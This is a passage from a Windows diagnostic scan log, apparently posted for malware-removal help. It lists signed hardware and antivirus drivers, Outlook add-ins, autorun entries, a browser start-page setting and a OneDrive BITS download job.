O23 - Driver R3: Intel(R) Serial IO SPI Driver v2 - (iaLPSS2_SPI_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_spi_adl.inf_amd64_334c460fea9b11a4\iaLPSS2_SPI_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Wireless Bluetooth(R) - (ibtusb) - C:\WINDOWS\System32\DriverStore\FileRepository\ibtusb.inf_amd64_16f57b72ff14f3e7\ibtusb.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology BUS - (IntcAudioBus) - C:\WINDOWS\System32\DriverStore\FileRepository\intcaudiobus.inf_amd64_799c962c58e6bfeb\IntcAudioBus.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® Audio - (IntcBTAu) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtau.inf_amd64_164a440e6b400316\IntcBTAu.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® LE Audio - (IntcBtLE) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtle.inf_amd64_0c9aadaff32d0209\IntcBtLE.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for USB Audio - (IntcUSB) - C:\WINDOWS\System32\DriverStore\FileRepository\intcusb.inf_amd64_c2a06a639869c7cd\IntcUSB.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology OED - (IntcOED) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\IntcOED.sys (sign: 'Intel Corporation')
O23 - Driver R3: ipf_acpi - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_2c4217605fff2443\ipf_acpi.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_cpu - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_cpu.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_lf - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_lf.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Kaspersky Lab KLMOUFLT.K4W-21-20 - (klmouflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klmouflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klids.K4W-21-20 - C:\ProgramData\Kaspersky Lab\AVP21.20\Bases\klids.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klupd_K4W-21-20_klark - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_klark.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klupd_K4W-21-20_mark - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_mark.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: Logitech G HUB Translation Layer Driver - (logi_joy_xlcore) - C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech G HUB Virtual Bus Enumerator Driver - (logi_joy_bus_enum) - C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech G HUB Virtual HID Device Driver - (logi_joy_vir_hid) - C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech LampArray Device Driver - (logi_lamparray) - C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray.sys (sign: 'Logitech Inc')
O23 - Driver R3: MBAMSwissArmy - C:\WINDOWS\System32\Drivers\mbamswissarmy.sys (sign: 'Microsoft' - Malwarebytes)
O23 - Driver R3: NVIDIA Virtual Audio Device (Wave Extensible) (WDM) - (nvvad_WaveExtensible) - C:\WINDOWS\system32\drivers\nvvad64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: nvlddmkm - C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\nvlddmkm.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: NVPCF Service - (nvpcf) - C:\WINDOWS\System32\drivers\nvpcf.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Realtek RT640 NT Driver - (rt640x64) - C:\WINDOWS\System32\drivers\rt640x64.sys (+safe mode) (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Thunderbolt(TM) Controller - (nhi) - C:\WINDOWS\System32\drivers\TbtBusDrv.sys (sign: 'Intel Corporation')
O23 - Driver S0: WinSetupMon - C:\WINDOWS\system32\DRIVERS\WinSetupMon.sys (file missing)
O23 - Driver S1: AMSDK Driver - (amsdk) - C:\WINDOWS\system32\drivers\amsdk.sys (sign: 'Zemana D.O.O. Sarajevo')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'epfwwfp'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'klim6'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'klwtp.K4W-21-20'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'Netwtw14'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'rt640x64'.
O26 - Office Addin: HKLM\..\ESET.OutlookAddin - (ESET Outlook Add-in) -> C:\Program Files\ESET\ESET Security\eplgOutlook.dll (sign: 'ESET, spol. s r.o.')
O26 - Office Addin: HKLM\..\OutlookKLAvPlg.Addin_D4D8A8A7-C191-40BB-9E4E-623874AD191D - (Kaspersky4Win Outlook Anti-Virus Addin) -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\x64\mcou.dll (sign: 'AO Kaspersky Lab')
O26-32 - Office Addin: HKLM\..\ESET.OutlookAddin - (ESET Outlook Add-in) -> C:\Program Files\ESET\ESET Security\x86\eplgOutlook.dll (sign: 'ESET, spol. s r.o.')
O26-32 - Office Addin: HKLM\..\OutlookKLAvPlg.Addin_D4D8A8A7-C191-40BB-9E4E-623874AD191D - (Kaspersky4Win Outlook Anti-Virus Addin) -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\mcou.dll (sign: 'AO Kaspersky Lab')

--
End of file - Time spent: 27,1 sec. - 90444 bytes, CRC32: FFFFFFFF. Sign: ⁥ō

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = hxxp://vvv.joygame.com/games.aspx?g=2001
O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\134.0.6998.89\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_E3D834145B9E086748646FF8637E21CC] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start (sign: 'Microsoft')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O22 - BITS Job: (download) {35B8E922-B052-4E37-A7F9-E8F4EDFD7994} - hxxps://oneclient.sfx.ms/Win/Installers/25.015.0126.0002/amd64/OneDriveSetup.exe -> C:\Users\eymen\AppData\Local\Temp\wct6522.tmp